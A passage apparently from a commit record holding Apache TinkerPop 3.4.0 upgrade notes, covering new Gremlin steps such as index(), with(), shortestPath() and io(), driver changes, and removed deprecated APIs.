that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The follow provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface and provided a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed however as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test` as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` class and use that instead. At this point, graph providers should have\nlong ago moved to the `Computer` infrastructure as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were long ago removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. By default, both of these methods will\nreturn `false`.\n\nShould a provider wish to support this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that value\nis not present or update an existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the most simple fashion, a graph could simply check the\nvalue of the supplied `T.id`, however graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`\nwhich encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customize\ntranslation, simply extend the `DefaultTypeTranslator` and override the methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provide to it as part of its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in parallel which should lead to better utilization of connections.\nThe `ConnectionPool` now also has a fixed size whereas it could previously create an unlimited number of connections.\nEach `Connection` can handle up to `MaxInProcessPerConnection` requests in parallel.\nIf this limit is reached for all connections, then a `NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Number Comparison of Predicates\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Added Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could place return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:link:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior version of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly use graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP style loading, it can be utilized in conjunction with OLAP which\ninternally uses `CloneVertexProgram` and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOption` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. It's only real use was for testing remote bytecode based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n==== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n==== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to them on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n==== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n==== Improvements in `min()` and `max()`\n\nPreviously `min()` and `max()` were only working for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values lead to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? [yN]\n----\n\nWith the changes in this release these kind of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n==== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequests messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> 